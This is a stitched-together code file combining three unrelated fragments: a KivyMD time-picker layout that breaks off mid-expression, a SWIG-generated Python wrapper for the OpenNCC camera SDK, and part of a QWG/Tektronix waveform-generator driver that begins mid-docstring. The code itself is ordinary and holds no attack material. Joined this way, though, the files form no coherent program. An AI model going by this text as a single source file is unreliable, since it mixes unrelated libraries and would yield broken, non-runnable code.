#:import MDFlatButton kivymd.button.MDFlatButton
#:import CircularTimePicker kivymd.vendor.circularTimePicker.CircularTimePicker
#:import dp kivy.metrics.dp
<MDTimePicker>
size_hint: (None, None)
size: [dp(270), dp(335) + dp(95)]
pos_hint: {'center_x': .5, 'center_y': .5}
canvas:
Color:
rgba: self.theme_cls.bg_light
Rectangle:
size: [dp(270), dp(335)]
pos: [root.pos[0], root.pos[1] + root.height - dp(335) - dp(95)]
Color:
rgba: self.theme_cls.primary_color
Rectangle:
size: [dp(270), dp(95)]
pos: [root.pos[0], root.pos[1] + root.height - dp(95)]
Color:
rgba: self.theme_cls.bg_dark
Ellipse:
size: [dp(220), dp(220)]
pos:
root.pos[0] + dp(270) / 2 - dp(220) / 2, root.pos[1]\
+ root.height - (dp(335) / 2 + dp(95)) - dp(220) / 2 + dp(35)
CircularTimePicker:
id: time_picker
pos: (dp(270) / 2) - (self.width / 2), root.height - self.height
size_hint: [.8, .8]
pos_hint: {'center_x': .5, 'center_y': .585}
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] -
# Repository: EyecloudAi/OpenNCC-SDK
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_openncc', [dirname(__file__)])
except ImportError:
import _openncc
return _openncc
if fp is not None:
try:
_mod = imp.load_module('_openncc', fp, pathname, description)
finally:
fp.close()
return _mod
_openncc = swig_import_helper()
del swig_import_helper
else:
import _openncc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
_openncc.YUV420p_swigconstant(_openncc)
YUV420p = _openncc.YUV420p
_openncc.RAW14_swigconstant(_openncc)
RAW14 = _openncc.RAW14
_openncc.H26X_swigconstant(_openncc)
H26X = _openncc.H26X
_openncc.JPEG_swigconstant(_openncc)
JPEG = _openncc.JPEG
_openncc.METEDATA_swigconstant(_openncc)
METEDATA = _openncc.METEDATA
_openncc.MONO_swigconstant(_openncc)
MONO = _openncc.MONO
_openncc.DEPTH_swigconstant(_openncc)
DEPTH = _openncc.DEPTH
_openncc.OUTPUT_INDEX_SIZE_swigconstant(_openncc)
OUTPUT_INDEX_SIZE = _openncc.OUTPUT_INDEX_SIZE
_openncc.USB_SUCCESS_swigconstant(_openncc)
USB_SUCCESS = _openncc.USB_SUCCESS
_openncc.USB_ERROR_IO_swigconstant(_openncc)
USB_ERROR_IO = _openncc.USB_ERROR_IO
_openncc.USB_ERROR_INVALID_PARAM_swigconstant(_openncc)
USB_ERROR_INVALID_PARAM = _openncc.USB_ERROR_INVALID_PARAM
_openncc.USB_ERROR_ACCESS_swigconstant(_openncc)
USB_ERROR_ACCESS = _openncc.USB_ERROR_ACCESS
_openncc.USB_ERROR_NO_DEVICE_swigconstant(_openncc)
USB_ERROR_NO_DEVICE = _openncc.USB_ERROR_NO_DEVICE
_openncc.USB_ERROR_NOT_FOUND_swigconstant(_openncc)
USB_ERROR_NOT_FOUND = _openncc.USB_ERROR_NOT_FOUND
_openncc.USB_ERROR_BUSY_swigconstant(_openncc)
USB_ERROR_BUSY = _openncc.USB_ERROR_BUSY
_openncc.USB_ERROR_TIMEOUT_swigconstant(_openncc)
USB_ERROR_TIMEOUT = _openncc.USB_ERROR_TIMEOUT
_openncc.USB_ERROR_OVERFLOW_swigconstant(_openncc)
USB_ERROR_OVERFLOW = _openncc.USB_ERROR_OVERFLOW
_openncc.USB_ERROR_PIPE_swigconstant(_openncc)
USB_ERROR_PIPE = _openncc.USB_ERROR_PIPE
_openncc.USB_ERROR_INTERRUPTED_swigconstant(_openncc)
USB_ERROR_INTERRUPTED = _openncc.USB_ERROR_INTERRUPTED
_openncc.USB_ERROR_NO_MEM_swigconstant(_openncc)
USB_ERROR_NO_MEM = _openncc.USB_ERROR_NO_MEM
_openncc.USB_ERROR_NOT_SUPPORTED_swigconstant(_openncc)
USB_ERROR_NOT_SUPPORTED = _openncc.USB_ERROR_NOT_SUPPORTED
_openncc.USB_ERROR_OTHER_swigconstant(_openncc)
USB_ERROR_OTHER = _openncc.USB_ERROR_OTHER
_openncc.IMG_FORMAT_GRAY_swigconstant(_openncc)
IMG_FORMAT_GRAY = _openncc.IMG_FORMAT_GRAY
_openncc.IMG_FORMAT_I420_swigconstant(_openncc)
IMG_FORMAT_I420 = _openncc.IMG_FORMAT_I420
_openncc.IMG_FORMAT_I422_swigconstant(_openncc)
IMG_FORMAT_I422 = _openncc.IMG_FORMAT_I422
_openncc.IMG_FORMAT_I444_swigconstant(_openncc)
IMG_FORMAT_I444 = _openncc.IMG_FORMAT_I444
_openncc.IMG_FORMAT_YUV444_swigconstant(_openncc)
IMG_FORMAT_YUV444 = _openncc.IMG_FORMAT_YUV444
_openncc.IMG_FORMAT_RGB_swigconstant(_openncc)
IMG_FORMAT_RGB = _openncc.IMG_FORMAT_RGB
_openncc.IMG_FORMAT_RGB_PLANAR_swigconstant(_openncc)
IMG_FORMAT_RGB_PLANAR = _openncc.IMG_FORMAT_RGB_PLANAR
_openncc.IMG_FORMAT_BGR_swigconstant(_openncc)
IMG_FORMAT_BGR = _openncc.IMG_FORMAT_BGR
_openncc.IMG_FORMAT_BGR_PLANAR_swigconstant(_openncc)
IMG_FORMAT_BGR_PLANAR = _openncc.IMG_FORMAT_BGR_PLANAR
_openncc.ENCODE_H264_MODE_swigconstant(_openncc)
ENCODE_H264_MODE = _openncc.ENCODE_H264_MODE
_openncc.ENCODE_H265_MODE_swigconstant(_openncc)
ENCODE_H265_MODE = _openncc.ENCODE_H265_MODE
class CameraInfo(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, CameraInfo, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, CameraInfo, name)
__repr__ = _swig_repr
__swig_setmethods__["imageWidth"] = _openncc.CameraInfo_imageWidth_set
__swig_getmethods__["imageWidth"] = _openncc.CameraInfo_imageWidth_get
if _newclass:
imageWidth = _swig_property(_openncc.CameraInfo_imageWidth_get, _openncc.CameraInfo_imageWidth_set)
__swig_setmethods__["imageHeight"] = _openncc.CameraInfo_imageHeight_set
__swig_getmethods__["imageHeight"] = _openncc.CameraInfo_imageHeight_get
if _newclass:
imageHeight = _swig_property(_openncc.CameraInfo_imageHeight_get, _openncc.CameraInfo_imageHeight_set)
__swig_setmethods__["startX"] = _openncc.CameraInfo_startX_set
__swig_getmethods__["startX"] = _openncc.CameraInfo_startX_get
if _newclass:
startX = _swig_property(_openncc.CameraInfo_startX_get, _openncc.CameraInfo_startX_set)
__swig_setmethods__["startY"] = _openncc.CameraInfo_startY_set
__swig_getmethods__["startY"] = _openncc.CameraInfo_startY_get
if _newclass:
startY = _swig_property(_openncc.CameraInfo_startY_get, _openncc.CameraInfo_startY_set)
__swig_setmethods__["endX"] = _openncc.CameraInfo_endX_set
__swig_getmethods__["endX"] = _openncc.CameraInfo_endX_get
if _newclass:
endX = _swig_property(_openncc.CameraInfo_endX_get, _openncc.CameraInfo_endX_set)
__swig_setmethods__["endY"] = _openncc.CameraInfo_endY_set
__swig_getmethods__["endY"] = _openncc.CameraInfo_endY_get
if _newclass:
endY = _swig_property(_openncc.CameraInfo_endY_get, _openncc.CameraInfo_endY_set)
__swig_setmethods__["inputDimWidth"] = _openncc.CameraInfo_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.CameraInfo_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.CameraInfo_inputDimWidth_get, _openncc.CameraInfo_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.CameraInfo_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.CameraInfo_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.CameraInfo_inputDimHeight_get, _openncc.CameraInfo_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.CameraInfo_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.CameraInfo_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.CameraInfo_inputFormat_get, _openncc.CameraInfo_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.CameraInfo_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.CameraInfo_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.CameraInfo_meanValue_get, _openncc.CameraInfo_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.CameraInfo_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.CameraInfo_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.CameraInfo_stdValue_get, _openncc.CameraInfo_stdValue_set)
__swig_setmethods__["isOutputYUV"] = _openncc.CameraInfo_isOutputYUV_set
__swig_getmethods__["isOutputYUV"] = _openncc.CameraInfo_isOutputYUV_get
if _newclass:
isOutputYUV = _swig_property(_openncc.CameraInfo_isOutputYUV_get, _openncc.CameraInfo_isOutputYUV_set)
__swig_setmethods__["isOutputH26X"] = _openncc.CameraInfo_isOutputH26X_set
__swig_getmethods__["isOutputH26X"] = _openncc.CameraInfo_isOutputH26X_get
if _newclass:
isOutputH26X = _swig_property(_openncc.CameraInfo_isOutputH26X_get, _openncc.CameraInfo_isOutputH26X_set)
__swig_setmethods__["isOutputJPEG"] = _openncc.CameraInfo_isOutputJPEG_set
__swig_getmethods__["isOutputJPEG"] = _openncc.CameraInfo_isOutputJPEG_get
if _newclass:
isOutputJPEG = _swig_property(_openncc.CameraInfo_isOutputJPEG_get, _openncc.CameraInfo_isOutputJPEG_set)
__swig_setmethods__["mode"] = _openncc.CameraInfo_mode_set
__swig_getmethods__["mode"] = _openncc.CameraInfo_mode_get
if _newclass:
mode = _swig_property(_openncc.CameraInfo_mode_get, _openncc.CameraInfo_mode_set)
def __init__(self):
this = _openncc.new_CameraInfo()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_CameraInfo
__del__ = lambda self: None
CameraInfo_swigregister = _openncc.CameraInfo_swigregister
CameraInfo_swigregister(CameraInfo)
_openncc.MAX_LABEL_SIZE_swigconstant(_openncc)
MAX_LABEL_SIZE = _openncc.MAX_LABEL_SIZE
_openncc.MAX_EXTINPUT_SIZE_swigconstant(_openncc)
MAX_EXTINPUT_SIZE = _openncc.MAX_EXTINPUT_SIZE
_openncc.MAX_OBJ_swigconstant(_openncc)
MAX_OBJ = _openncc.MAX_OBJ
class Network1Par(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Network1Par, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Network1Par, name)
__repr__ = _swig_repr
__swig_setmethods__["imageWidth"] = _openncc.Network1Par_imageWidth_set
__swig_getmethods__["imageWidth"] = _openncc.Network1Par_imageWidth_get
if _newclass:
imageWidth = _swig_property(_openncc.Network1Par_imageWidth_get, _openncc.Network1Par_imageWidth_set)
__swig_setmethods__["imageHeight"] = _openncc.Network1Par_imageHeight_set
__swig_getmethods__["imageHeight"] = _openncc.Network1Par_imageHeight_get
if _newclass:
imageHeight = _swig_property(_openncc.Network1Par_imageHeight_get, _openncc.Network1Par_imageHeight_set)
__swig_setmethods__["startX"] = _openncc.Network1Par_startX_set
__swig_getmethods__["startX"] = _openncc.Network1Par_startX_get
if _newclass:
startX = _swig_property(_openncc.Network1Par_startX_get, _openncc.Network1Par_startX_set)
__swig_setmethods__["startY"] = _openncc.Network1Par_startY_set
__swig_getmethods__["startY"] = _openncc.Network1Par_startY_get
if _newclass:
startY = _swig_property(_openncc.Network1Par_startY_get, _openncc.Network1Par_startY_set)
__swig_setmethods__["endX"] = _openncc.Network1Par_endX_set
__swig_getmethods__["endX"] = _openncc.Network1Par_endX_get
if _newclass:
endX = _swig_property(_openncc.Network1Par_endX_get, _openncc.Network1Par_endX_set)
__swig_setmethods__["endY"] = _openncc.Network1Par_endY_set
__swig_getmethods__["endY"] = _openncc.Network1Par_endY_get
if _newclass:
endY = _swig_property(_openncc.Network1Par_endY_get, _openncc.Network1Par_endY_set)
__swig_setmethods__["inputDimWidth"] = _openncc.Network1Par_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.Network1Par_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.Network1Par_inputDimWidth_get, _openncc.Network1Par_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.Network1Par_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.Network1Par_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.Network1Par_inputDimHeight_get, _openncc.Network1Par_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.Network1Par_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.Network1Par_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.Network1Par_inputFormat_get, _openncc.Network1Par_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.Network1Par_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.Network1Par_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.Network1Par_meanValue_get, _openncc.Network1Par_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.Network1Par_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.Network1Par_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.Network1Par_stdValue_get, _openncc.Network1Par_stdValue_set)
__swig_setmethods__["isOutputYUV"] = _openncc.Network1Par_isOutputYUV_set
__swig_getmethods__["isOutputYUV"] = _openncc.Network1Par_isOutputYUV_get
if _newclass:
isOutputYUV = _swig_property(_openncc.Network1Par_isOutputYUV_get, _openncc.Network1Par_isOutputYUV_set)
__swig_setmethods__["isOutputH26X"] = _openncc.Network1Par_isOutputH26X_set
__swig_getmethods__["isOutputH26X"] = _openncc.Network1Par_isOutputH26X_get
if _newclass:
isOutputH26X = _swig_property(_openncc.Network1Par_isOutputH26X_get, _openncc.Network1Par_isOutputH26X_set)
__swig_setmethods__["isOutputJPEG"] = _openncc.Network1Par_isOutputJPEG_set
__swig_getmethods__["isOutputJPEG"] = _openncc.Network1Par_isOutputJPEG_get
if _newclass:
isOutputJPEG = _swig_property(_openncc.Network1Par_isOutputJPEG_get, _openncc.Network1Par_isOutputJPEG_set)
__swig_setmethods__["mode"] = _openncc.Network1Par_mode_set
__swig_getmethods__["mode"] = _openncc.Network1Par_mode_get
if _newclass:
mode = _swig_property(_openncc.Network1Par_mode_get, _openncc.Network1Par_mode_set)
__swig_setmethods__["extInputs"] = _openncc.Network1Par_extInputs_set
__swig_getmethods__["extInputs"] = _openncc.Network1Par_extInputs_get
if _newclass:
extInputs = _swig_property(_openncc.Network1Par_extInputs_get, _openncc.Network1Par_extInputs_set)
__swig_setmethods__["modelCascade"] = _openncc.Network1Par_modelCascade_set
__swig_getmethods__["modelCascade"] = _openncc.Network1Par_modelCascade_get
if _newclass:
modelCascade = _swig_property(_openncc.Network1Par_modelCascade_get, _openncc.Network1Par_modelCascade_set)
__swig_setmethods__["inferenceACC"] = _openncc.Network1Par_inferenceACC_set
__swig_getmethods__["inferenceACC"] = _openncc.Network1Par_inferenceACC_get
if _newclass:
inferenceACC = _swig_property(_openncc.Network1Par_inferenceACC_get, _openncc.Network1Par_inferenceACC_set)
def __init__(self):
this = _openncc.new_Network1Par()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_Network1Par
__del__ = lambda self: None
Network1Par_swigregister = _openncc.Network1Par_swigregister
Network1Par_swigregister(Network1Par)
class Network2Par(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Network2Par, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Network2Par, name)
__repr__ = _swig_repr
__swig_setmethods__["startXAdj"] = _openncc.Network2Par_startXAdj_set
__swig_getmethods__["startXAdj"] = _openncc.Network2Par_startXAdj_get
if _newclass:
startXAdj = _swig_property(_openncc.Network2Par_startXAdj_get, _openncc.Network2Par_startXAdj_set)
__swig_setmethods__["startYAdj"] = _openncc.Network2Par_startYAdj_set
__swig_getmethods__["startYAdj"] = _openncc.Network2Par_startYAdj_get
if _newclass:
startYAdj = _swig_property(_openncc.Network2Par_startYAdj_get, _openncc.Network2Par_startYAdj_set)
__swig_setmethods__["endXAdj"] = _openncc.Network2Par_endXAdj_set
__swig_getmethods__["endXAdj"] = _openncc.Network2Par_endXAdj_get
if _newclass:
endXAdj = _swig_property(_openncc.Network2Par_endXAdj_get, _openncc.Network2Par_endXAdj_set)
__swig_setmethods__["endYAdj"] = _openncc.Network2Par_endYAdj_set
__swig_getmethods__["endYAdj"] = _openncc.Network2Par_endYAdj_get
if _newclass:
endYAdj = _swig_property(_openncc.Network2Par_endYAdj_get, _openncc.Network2Par_endYAdj_set)
__swig_setmethods__["labelMask"] = _openncc.Network2Par_labelMask_set
__swig_getmethods__["labelMask"] = _openncc.Network2Par_labelMask_get
if _newclass:
labelMask = _swig_property(_openncc.Network2Par_labelMask_get, _openncc.Network2Par_labelMask_set)
__swig_setmethods__["minConf"] = _openncc.Network2Par_minConf_set
__swig_getmethods__["minConf"] = _openncc.Network2Par_minConf_get
if _newclass:
minConf = _swig_property(_openncc.Network2Par_minConf_get, _openncc.Network2Par_minConf_set)
__swig_setmethods__["inputDimWidth"] = _openncc.Network2Par_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.Network2Par_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.Network2Par_inputDimWidth_get, _openncc.Network2Par_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.Network2Par_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.Network2Par_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.Network2Par_inputDimHeight_get, _openncc.Network2Par_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.Network2Par_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.Network2Par_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.Network2Par_inputFormat_get, _openncc.Network2Par_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.Network2Par_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.Network2Par_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.Network2Par_meanValue_get, _openncc.Network2Par_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.Network2Par_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.Network2Par_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.Network2Par_stdValue_get, _openncc.Network2Par_stdValue_set)
__swig_setmethods__["extInputs"] = _openncc.Network2Par_extInputs_set
__swig_getmethods__["extInputs"] = _openncc.Network2Par_extInputs_get
if _newclass:
extInputs = _swig_property(_openncc.Network2Par_extInputs_get, _openncc.Network2Par_extInputs_set)
__swig_setmethods__["modelCascade"] = _openncc.Network2Par_modelCascade_set
__swig_getmethods__["modelCascade"] = _openncc.Network2Par_modelCascade_get
if _newclass:
modelCascade = _swig_property(_openncc.Network2Par_modelCascade_get, _openncc.Network2Par_modelCascade_set)
def __init__(self):
this = _openncc.new_Network2Par()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_Network2Par
__del__ = lambda self: None
Network2Par_swigregister = _openncc.Network2Par_swigregister
Network2Par_swigregister(Network2Par)
class frameSpecOut(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, frameSpecOut, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, frameSpecOut, name)
__repr__ = _swig_repr
__swig_setmethods__["type"] = _openncc.frameSpecOut_type_set
__swig_getmethods__["type"] = _openncc.frameSpecOut_type_get
if _newclass:
type = _swig_property(_openncc.frameSpecOut_type_get, _openncc.frameSpecOut_type_set)
__swig_setmethods__["seqNo"] = _openncc.frameSpecOut_seqNo_set
__swig_getmethods__["seqNo"] = _openncc.frameSpecOut_seqNo_get
if _newclass:
seqNo = _swig_property(_openncc.frameSpecOut_seqNo_get, _openncc.frameSpecOut_seqNo_set)
__swig_setmethods__["size"] = _openncc.frameSpecOut_size_set
__swig_getmethods__["size"] = _openncc.frameSpecOut_size_get
if _newclass:
size = _swig_property(_openncc.frameSpecOut_size_get, _openncc.frameSpecOut_size_set)
__swig_setmethods__["res"] = _openncc.frameSpecOut_res_set
__swig_getmethods__["res"] = _openncc.frameSpecOut_res_get
if _newclass:
res = _swig_property(_openncc.frameSpecOut_res_get, _openncc.frameSpecOut_res_set)
def __init__(self):
this = _openncc.new_frameSpecOut()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_frameSpecOut
__del__ = lambda self: None
frameSpecOut_swigregister = _openncc.frameSpecOut_swigregister
frameSpecOut_swigregister(frameSpecOut)
def GetYuvData(pbuf: 'char *') -> "int":
return _openncc.GetYuvData(pbuf)
GetYuvData = _openncc.GetYuvData
def GetMetaData(pbuf: 'char *') -> "int":
return _openncc.GetMetaData(pbuf)
GetMetaData = _openncc.GetMetaData
def GetH26xData(pbuf: 'char *') -> "int":
return _openncc.GetH26xData(pbuf)
GetH26xData = _openncc.GetH26xData
def GetJpegData(pbuf: 'char *') -> "int":
return _openncc.GetJpegData(pbuf)
GetJpegData = _openncc.GetJpegData
def get_sdk_version() -> "char *":
return _openncc.get_sdk_version()
get_sdk_version = _openncc.get_sdk_version
def load_fw(bootExe: 'char const *', firmware: 'char const *') -> "int":
return _openncc.load_fw(bootExe, firmware)
load_fw = _openncc.load_fw
def load_fwExt(bootExe: 'char const *', firmware: 'char const *', pid: 'int') -> "int":
return _openncc.load_fwExt(bootExe, firmware, pid)
load_fwExt = _openncc.load_fwExt
def sdk_init(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', cam: 'CameraInfo', cam_Len: 'int') -> "int":
return _openncc.sdk_init(cb, param, blob_path, cam, cam_Len)
sdk_init = _openncc.sdk_init
def sdk_init_ex(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', cam: 'Network1Par', cam_Len: 'int') -> "int":
return _openncc.sdk_init_ex(cb, param, blob_path, cam, cam_Len)
sdk_init_ex = _openncc.sdk_init_ex
def sdk_net2_init(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', par: 'Network1Par', par_Len: 'int', blob2_path: 'char const *', par2: 'Network2Par', par2_Len: 'int') -> "int":
return _openncc.sdk_net2_init(cb, param, blob_path, par, par_Len, blob2_path, par2, par2_Len)
sdk_net2_init = _openncc.sdk_net2_init
def sdk_uninit() -> "void":
return _openncc.sdk_uninit()
sdk_uninit = _openncc.sdk_uninit
def get_usb_version() -> "int":
return _openncc.get_usb_version()
get_usb_version = _openncc.get_usb_version
def get_err_no() -> "int":
return _openncc.get_err_no()
get_err_no = _openncc.get_err_no
QWG will continuously validate whether the active index is still stable.\n
\t- If no suitable indexes are found, FIXME is empty and an error is pushed onto the error stack\n
"""
self.write(f'DIO:CALibrate {target_index}')
# FIXME: define relation with mode and #codewords in use
# FIXME: provide high level function that performs the calibration
def dio_calibration_rapport(self, extended: bool=False) -> str:
"""
Return a string containing the latest DIO calibration report (successful and failed calibrations). Includes:
selected index, dio mode, valid indexes, calibrated DIO bits and the DIO bitDiff table.
:param extended: Adds more information about DIO: interboard and LVDS
:return: String of DIO calibration report
"""
info = f'- Calibrated: {self.dio_is_calibrated()}\n' \
f'- Mode: {self.dio_mode()}\n' \
f'- Selected index: {self.dio_active_index()}\n' \
f'- Suitable indexes: {self.dio_suitable_indexes()}\n' \
f'- Calibrated DIO bits: {bin(self.dio_calibrated_inputs())}\n' \
f'- DIO bit diff table:\n{self._dio_bit_diff_table()}'
if extended:
info += f'\n- LVDS detected: {self.dio_lvds()}\n' \
f'- Interboard detected: {self.dio_interboard()}'
return info
##########################################################################
# AWG5014 functions: WLIST (Waveform list)
##########################################################################
# FIXME: disabled, but supported by QWG
# def getWlistSize(self):
# return self.ask_int('wlist:size?')
def _getWlistName(self, idx):
"""
Args:
idx(int): 0..size-1
"""
return self.ask('wlist:name? %d' % idx)
def _getWlist(self):
"""
NB: takes a few seconds on 5014: our fault or Tek's?
"""
size = self.WlistSize()
wlist = [] # empty list
for k in range(size): # build list of names
wlist.append(self._getWlistName(k+1))
return wlist
def deleteWaveform(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'test'
"""
self.write('wlist:waveform:delete "%s"' % name)
def getWaveformType(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
Returns:
'INT' or 'REAL'
"""
return self.ask('wlist:waveform:type? "%s"' % name)
def getWaveformLength(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
"""
return self.ask_int('wlist:waveform:length? "%s"' % name)
def newWaveformReal(self, name, len):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
NB: seems to do nothing (on Tek5014) if waveform already exists
"""
self.write('wlist:waveform:new "%s",%d,real' % (name, len))
def getWaveformDataFloat(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
Returns:
waveform (np.array of float): waveform data
Compatibility: QWG
"""
self.write('wlist:waveform:data? "%s"' % name)
binBlock = self.binBlockRead()
waveform = np.frombuffer(binBlock, dtype=np.float32) # extract waveform
return waveform
def sendWaveformDataReal(self, name, waveform):
"""
send waveform and markers directly to AWG memory, i.e. not to a file
on the AWG disk.
NB: uses real data normalized to the range from -1 to 1 (independent
of number of DAC bits of AWG)
Args:
name (string): waveform name excluding double quotes, e.g. 'test'.
Must already exist in AWG
waveform (np.array of float)): vector defining the waveform,
normalized between -1.0 and 1.0
Compatibility: QWG
Based on:
Tektronix_AWG5014.py::send_waveform, which sends data to an AWG
_file_, not a memory waveform
'awg_transferRealDataWithMarkers', Author = <NAME>,
Compatibility = Tektronix AWG5014, AWG7102
"""
# generate the binblock
arr = np.asarray(waveform, dtype=np.float32)
binBlock = arr.tobytes()
# write binblock
hdr = f'wlist:waveform:data "{name}",'
self.binBlockWrite(binBlock, hdr)
def createWaveformReal(self, name, waveform):
"""
Convenience function to create a waveform in the AWG and then send
data to it
Args:
name(string): name of waveform for internal use by the AWG
waveform (float[numpoints]): vector defining the waveform,
normalized between -1.0 and 1.0
Compatibility: QWG
"""
wv_val = vals.Arrays(min_value=-1, max_value=1)
wv_val.validate(waveform)
maxWaveLen = 2**17-4 # FIXME: this is the hardware max
waveLen = len(waveform)
if waveLen > maxWaveLen:
raise ValueError(f'Waveform length ({waveLen}) must be < {maxWaveLen}')
self.newWaveformReal(name, waveLen)
self.sendWaveformDataReal(name, waveform)
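# Usage sketch (illustrative; 'qwg' stands for an already-connected instance of
# this driver). createWaveformReal() validates the [-1, 1] range and the length
# limit, then allocates the waveform and uploads the samples:
#
#     t = np.linspace(0, 1, 1000, endpoint=False)
#     qwg.createWaveformReal('demo_sine', 0.5 * np.sin(2 * np.pi * 5 * t))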
##########################################################################
# Generic (i.e. at least AWG520 and AWG5014) Tektronix AWG functions
##########################################################################
# Tek_AWG functions: menu Setup|Waveform/Sequence
def loadWaveformOrSequence(self, awgFileName):
"""
awgFileName: name referring to AWG file system
"""
self.write('source:def:user "%s"' % awgFileName)
# NB: we only support default Mass Storage Unit Specifier "Main",
# which is the internal harddisk
##########################################################################
# private helpers
##########################################################################
@staticmethod
def _int_to_array(msg):
"""
Convert a scpi array of ints into a python int array
:param msg: scpi result
:return: array of ints
"""
if msg == "\"\"":
return []
return [int(x) for x in msg.split(',')]
##########################################################################
# (sort of) private DIO functions
##########################################################################
def _dio_bit_diff_table(self):
"""
FOR DEVELOPMENT ONLY: Get the bit diff table of the last calibration
:return: String of the bitDiff table
"""
return self.ask("DIO:BDT").replace("\"", '').replace(",", "\n")
def _dio_calibrate_param(self, meas_time: float, nr_itr: int, target_index: int = ""):
"""
FOR DEVELOPMENT ONLY: Calibrate the DIO input signals with extra arguments.\n
Parameters:
\t meas_time: Measurement time between indexes in seconds, resolution of 1e-6 s
\tNote that when selecting a measurement time longer than 25e-2 s the SCPI connection
will time out, but the calibration is then still running. The timeout will happen on the
first `get` of a parameter after this call\n
\tnr_itr: Number of DIO signal data (bitDiffs) gathering iterations\n
\ttarget_index: DIO index which determines on which side of the edge to select the active index from\n
Calibration duration = meas_time * nr_itr * 20 * 1.1 (10% to compensate for log printing time)\n
"""
if meas_time < 1e-6:
